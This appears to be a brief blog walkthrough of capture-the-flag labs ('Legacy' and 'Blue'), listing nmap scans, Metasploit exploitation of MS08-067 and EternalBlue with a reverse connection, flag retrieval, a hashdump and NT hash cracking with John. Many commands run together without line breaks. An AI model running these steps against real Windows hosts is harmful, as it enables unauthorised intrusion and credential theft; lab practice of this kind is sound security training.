Mastering EternalBlue MS17–010 & MS08–067: A Hands-On, Step-by-Step Walkthrough to Exploiting Legacy Windows Vulnerabilities
MS08-067
nmap -p0- -Pn -sC -sV --min-rate 2000 --max-retries 8 -iL legacy.htb --stats-every 60 --reason -oN all-port-nmap-output.txt
nmap -p 135,139,445 -Pn -O -sV -sC --script vuln -min-rate 2000 -iL legacy.htb -stats-every 60 -oN detailed-nmap-output.txtmsfconsolesearch ms08-067use 0optionsset RHOSTS <ip>set LHOST tun0 run OR exploitpwdcd ../../pwddircd "Documents and Settings"dir cd Administrator cd Desktopdircat root.txt
Eternal Blue MS17-010
nmap -p0- -Pn -sC -sV --min-rate 2000 --max-retries 8 -iL blue.thm --stats-every 60 --reason -oN all-port-nmap-output.txt
nmap -p 135,139,445 -Pn -O -sV -sC --script vuln -min-rate 2000 -iL blue.thm -stats-every 60 -oN detailed-nmap-output.txtmsfconsolesearch ms17-010use 0optionsset RHOSTS <ip>set lhost tun0rungetuidshellCTRL + Z and type yhashdumpCopy and past jon's hash into a text editor and then savejohn --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
pwddircat flag1.txt
Comments
Post a Comment